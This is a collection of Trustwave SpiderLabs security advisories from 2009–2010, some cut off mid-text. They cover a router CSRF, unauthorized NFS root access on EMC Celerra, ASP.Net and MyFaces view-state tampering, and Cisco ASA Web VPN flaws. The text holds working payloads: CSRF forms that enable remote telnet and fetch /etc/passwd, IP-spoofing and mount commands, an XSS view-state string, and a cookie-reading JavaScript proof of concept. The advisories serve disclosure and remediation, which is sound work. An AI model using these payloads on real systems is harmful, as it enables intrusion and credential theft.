form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_network_set input type=hidden name=enable_remote_access value=YES input type=hidden name=remote_access_port value=80 input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_setenable_remo te_access=YESremote_access_port=80' Enable telnet if not already enabled: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_set_wimax_etc_config input type=hidden name=ENABLE_TELNET value=YES input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_set_wimax_etc_configEN ABLE_TELNET=YES' Allow remote telnet access: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_network_set input type=hidden name=add_enable value=YES input type=hidden name=add_host_ip value=1 input type=hidden name=add_port value=23 input type=hidden name=add_protocol value=BOTH input type=hidden name=add_memo value=admintelnet input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_network_setadd_enable= YESadd_host_ip=1add_port=23add_protocol=bothadd_memo=admintelnet' Once compromised, it is possible to download any file from the devices using the following method. Download /etc/passwd file: form method=post action=http://192.168.1.1/cgi-bin/upgrademain.cgi http://192.168.1.1/cgi-bin/upgrademain.cgi input type=hidden name=act value=act_file_download input type=hidden name=METHOD value=PATH input type=hidden name=FILE_PATH value=/etc/passwd input type=submit /form or img src='http://192.168.1.1/cgi-bin/upgrademain.cgi?act=act_file_downloadMETHO D=PATHFILE_PATH=/etc/passwd' Vendor Response: No official response is available at the time of release. Remediation Steps: No patch currently exists for this issue. To limit exposure, network access to these devices should be limited to authorized personnel through the use of Access Control Lists and proper network segmentation. Vendor Communication Timeline: 8/26/10 - Vendor contact initiated. 9/30/10 - Vulnerability details provided to vendor. 12/3/10 - Notified vendor of release date. No workaround or patch provided. 12/10/10 - Advisory published. Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and
TWSL2010-003: Unauthorized access to root NFS export on EMC Celerra NAS appliance
Trustwave's SpiderLabs Security Advisory TWSL2010-003: Unauthorized access to root NFS export on EMC Celerra Network Attached Storage (NAS) appliance https://www.trustwave.com/spiderlabs/advisories/TWSL2010-003.txt Published: 2010-07-29 Version: 1.0 Vendor: EMC (http://www.emc.com) Product: Celerra Unified Storage products (http://www.emc.com/products/family/celerra-family.htm) Version(s) affected: All Product Description: The Celerra Unified Storage Platform provides Network Attached Storage (NAS) services through a combination of server appliances and software modules. Credit: Steve Ocepek of Trustwave's SpiderLabs CVE: CVE-2010-2860 Finding: The Celerra appliance's NFS server freely exports its / file system and enforces access using a factory-defined list of authorized IP addresses. The addresses found on a recent model are listed in the showmount example below, however this list may differ depending on product version. The IP addresses are intended for communication internal to the appliance, but are still accepted from external sources. An attacker can mount this file system by spoofing an authorized IP address. The NFS showmount command can be used to obtain a list of the IP addresses: # showmount -e Celerra IP address Export list for Celerra IP address: / 128.221.253.101,128.221.252.101,128.221.253.100,128.221.252.100 Because the appliance's NFS server does not enable the rootsquash feature, full access to the file system is possible by mounting the export using root (UID 0). Fully spoofing the source IP address (for sending and receiving packets) will usually require access to the local subnet or the ability to exploit some other network infrastructure vulnerability. On Linux, local IP address spoofing can be accomplished by creating an alias interface and using the ip route command to set the source IP accordingly. # ifconfig eth0:0 128.221.253.101 # ip route add Celerra IP address dev eth0 src 128.221.253.101 # mkdir nfs # mount Celerra IP address:/ nfs The flaw allows unauthorized access to files contained on the system, including all CIFS shares and iSCSI mounted drives. The / path does not correspond to the true root of the file system -- only the root of the user data directory is exposed. Vendor Response: The vendor has acknowledged this issue and issued the following workaround. Vendor has also published a knowledgebase article about the issue and mitigation so support can help any customers who call in with this issue until a permanent fix from EMC is available. Vendor estimated date for a code fix is Q3 2010. Remediation Steps: The following recommendations were provided by the vendor. 1. Hide NFS exports and show it only based on the configured access. Setting forceFullShowmount param to 0 (default is 1) will hide the / from the list since only Control Station have access to it for administration purpose: [r...@virgil slot_3]# server_param server_3 -f mount -info forceFullShowmount server_3 : name= forceFullShowmount facility_name = mount default_value = 1 current_value = 1 configured_value= user_action = none change_effective= immediate range = (0,1) description = Forces response to showmount requests to fully populate response. [r...@virgil slot_3]# server_param server_3 -f mount -modify \ forceFullShowmount -value 0 server_3 : done After the above change, client will see only the shares he have permissions to access to: /usr/sbin/showmount -e 172.24.97.3 Export list for 172.24.97.3: /fs1 (everyone) 2. Change default IP addresses (during install or after) for internal network along with first step above to further minimize the exploitability. Product team has provided additional mitigations steps that can be implemented by the customers to reduce the severity of exploitation of a vulnerability: 1. Create IP-based access rules on the network equipment rejecting traffic for IP addresses belonging to internal Celerra network which do have own switch for that purpose. These addresses are listed in the /etc/hosts file of the Celerra Control Station. 2. Configure firewall(s) between Data Movers and NFS clients to reject traffic for IP addresses belonging to the internal Celerra network. 3. Hide NFS exports and show it only based on the configured access. Setting forceFullShowmount param to 0 (default is 1) will hide the ³/² from the list since only Control Station have access to it for administration purpose. 4.Disable IP reflect Vendor Communication Timeline: 05/07/10 - Initial communication 05/10/10 - Vulnerability details provided 05/18/10 - Vulnerability acknowledged, workaround and timeline provided 07/27/10 - Additional workaround details provided Revision History: 1.0 Initial publication About Trustwave: Trustwave is the leading provider of on-demand and subscription-based
Trustwave's SpiderLabs Security Advisory TWSL2010-001
Trustwave's SpiderLabs Security Advisory TWSL2010-001:
Multiplatform View State Tampering Vulnerabilities
Published: 2010-02-08 Version: 1.1
SpiderLabs has documented view state tampering
vulnerabilities in three products from separate vendors.
View states are used by some web application frameworks to
store the state of HTML GUI controls. View states are
typically stored in hidden client-side input fields,
although server-side storage is widely supported.
The affected vendors generally recommend that client-side
view states are cryptographically signed and/or encrypted,
but specific exploits have not been previously documented.
These vulnerabilities show that unsigned client-side view
states will ALWAYS result in a vulnerability in the affected
products.
Credit: David Byrne of Trustwave's SpiderLabs
===
Vendor: Microsoft (http://www.microsoft.com)
Product: ASP.Net (http://www.asp.net)
Versions affected: .Net 3.5 is confirmed vulnerable;
previous versions are likely to be vulnerable as well.
Description:
ASP.Net is a web-application development framework that
provides for both user interfaces, and back-end
functionality.
The ASP.Net view state is typically stored in a hidden field
named __VIEWSTATE. When a page's view state is not
cryptographically signed, many standard .Net controls are
vulnerable to Cross-Site Scripting (XSS) through the view
state.
It is well documented that using an unsigned view state is
bad, but most previous advisories focus on vaguely
described threats or vulnerabilities introduced by custom
use of the view state. To the best of Trustwave's knowledge,
this is the first time a proof of concept attack of this
nature has been demonstrated against the view state. A
vulnerability was alluded to in a 2004 Microsoft article on
troubleshooting view state problems [1]. However, other
Microsoft documents recommend disabling view state signing
if performance is a key consideration, [2, 3, 4] or for
various other reasons [5, 6]. Realistically, unsigned view
states should never be used in a production environment.
The following code is vulnerable to a XSS attack against the
form control. Note that the ValidateRequest setting does
not prevent the attack.
%@ Page EnableViewStateMac=False
ValidateRequest=True %
html runat=server
form runat=server/
/html
If the following request is sent to the server, the response
will contain JavaScript that calls an alert box.
xss.aspx?__VIEWSTATE=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxY
CHglpbm5lcmh0bWwFHTxzY3JpcHQ%2BYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2
BZGQ=
The view state's XML equivalent is below:
?xml version=1.0 encoding=utf-16?
viewstate
Pair
Pair
String-834067820/String
Pair
ArrayList
Int320/Int32
Pair
ArrayList
Int321/Int32
Pair
ArrayList
IndexedStringinnerhtml/IndexedString
Stringlt;scriptgt;alert('xss')lt;/scriptgt;/String
/ArrayList
/Pair
/ArrayList
/Pair
/ArrayList
/Pair
/Pair
/Pair
/viewstate
The HTML response is below:
html
form name=ctl01 method=post
action=xss.aspx id=ctl01
div
input type=hidden name=__VIEWSTATE id=__VIEWSTATE
value=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0b
WwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ= /
/div
scriptalert('xss')/script/form
/html
This example uses the innerhtml attribute of the form
control, although other attributes in other controls are
also vulnerable to similar attacks.
Remediation Steps:
The ASP.Net view state should always be cryptographically
signed with a Message Authentication Code (MAC). This has
been enabled by default since .Net 1.1, but can be disabled
using the EnableViewStateMac setting. Using the
ViewStateUserKey setting can also help to mitigate the
scope of this vulnerability. [7]
===
Vendor: Apache Software Foundation (http://www.apache.org)
Product: Apache MyFaces (http://myfaces.apache.org/)
Versions affected: 1.2.8 and 1.1.7 are confirmed as
vulnerable. All previous versions are likely vulnerable.
Related products: Some versions of IBM WebSphere Application
Server (at least 6.x and 7.x) ship with Apache MyFaces
[8,9]
Description:
MyFaces is an open source implementation of the JavaServer
Faces standard. JavaServer Faces [10] is a framework that
aids in developing user interfaces for web-based
applications.
When the application's view state is not encrypted, it is
possible for an attacker to supply a new or modified view
object as part of a request. The malicious view can contain
arbitrary HTML code (allowing Cross-Site Scripting), and
arbitrary Expression Language (EL) [11] statements that will
be executed on the server. The EL statements can be used to
read data stored
Trustwave's SpiderLabs Security Advisory TWSL2009-002
Trustwave's SpiderLabs Security Advisory TWSL2009-002:
Cisco ASA Web VPN Multiple Vulnerabilities
Published: 2009-06-24 Version: 1.0
Vendor: Cisco Systems, Inc. (http://www.cisco.com)
Versions affected: 8.0(4), 8.1.2, and 8.2.1
Description: Cisco's Adaptive Security Appliance (ASA)
provides a number of security related features, including
Web VPN functionality that allows authenticated users to
access a variety of content through a web interface. This
includes other web content, FTP servers, and CIFS file
servers.
The web content is proxied by the ASA and rewritten so that
any URLs in the web content are passed as query parameters
sent to the ASA web interface. Where scripting content is
present, the ASA places a JavaScript wrapper around the
original webpage's Document Object Model (DOM), to prevent
the webpage from accessing the ASA's DOM.
Credit: David Byrne of Trustwave's SpiderLabs
Finding 1: Post-Authentication Cross-Site Scripting
CVE: CVE-2009-1201
The ASA's DOM wrapper can be rewritten in a manner to allow
Cross-Site Scripting (XSS) attacks. For example, the
csco_wrap_js JavaScript function in /+CSCOL+/cte.js makes
a call to a function referenced by CSCO_WebVPN['process'].
The result of this call is then used in an eval statement.
function csco_wrap_js(str)
{
var ret=script id=CSCO_GHOST src=+CSCO_Gateway+
/+CSCOL+/cte.js/scr+
iptscript id=CSCO_GHOST src=+
CSCO_Gateway+/+CSCOE+/apcf/sc+ript;
var js_mangled=CSCO_WebVPN['process']('js',str);
ret+=CSCO_WebVPN['process']('html',eval(js_mangled));
return ret;
};
To exploit this behavior, a malicious page can rewrite
CSCO_WebVPN['process'] with an attacker-defined function
that will return an arbitrary value. The next time the
csco_wrap_js function is called, the malicious code will
be executed. Below is a proof of concept.
htmlscript
function a(b, c)
{
return alert('Your VPN location:\\n\\n'+ +
document.location+'\\n\\n\\n\\n\\n +
Your VPN cookie:\\n\\n'+document.cookie);;
}
CSCO_WebVPN['process'] = a;
csco_wrap_js('');
/script/html
Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
A vendor response will be posted at
http://www.cisco.com/security This vulnerability is
documented in Cisco Bug ID: CSCsy80694.
CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9
Finding 2: HTML Rewriting Bypass
CVE: CVE-2009-1202
When a webpage is requested through the ASA's Web VPN, the
targeted scheme and hostname is Rot13-encoded, then
hex-encoded and placed in the ASA's URL. For example,
http://www.trustwave.com; is accessed by requesting the
following ASA path:
/+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A+
+/
The HTML content of this request is obviously reformatted by
the ASA, starting at the very beginning:
script id='CSCO_GHOST' src=/+webvpn+/toolbar.js
However, if the request URL is modified to change the
initial hex value of 00 to 01, the HTML document is
returned without any rewriting. This allows the pages
scriptable content to run in the ASA's DOM, making
Cross-Site Scripting trivial.
Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80705.
CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C
Base: 4.3
Temporal: 3.9
Finding 3: Authentication Credential Theft
CVE: CVE-2009-1203
When a user accesses an FTP or CIFS destination using the
Web VPN, the resulting URL is formatted in a similar manner
as the web requests described above. The following URL
attempts to connect to ftp.example.com; normally, it would
be in an HTML frame within the Web VPN website.
/+CSCOE+/files/browse.html?code=initpath=ftp%3A%2F%2F736763
2e726b6e7a6379722e70627a
The ASA first attempts to connect to the FTP server or CIFS
share using anonymous credentials. If those fail, the user
is prompted for login credentials. When viewed on its own
(outside of a frame), the submission form gives no
indication what it is for and is very similar in appearance
to the Web VPN's primary login page. If the URL was sent to
a user by an attacker, it is very possible that a user would
assume that he needs to resubmit credentials to the Web VPN.
The ASA would then forward the credentials to the attacker's
FTP or CIFS server.
Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34,
and 8.1.2.25.
Updated Cisco ASA software can be downloaded from:
http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
A vendor response will be posted at
http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID:
CSCsy80709.
CVSS Score:
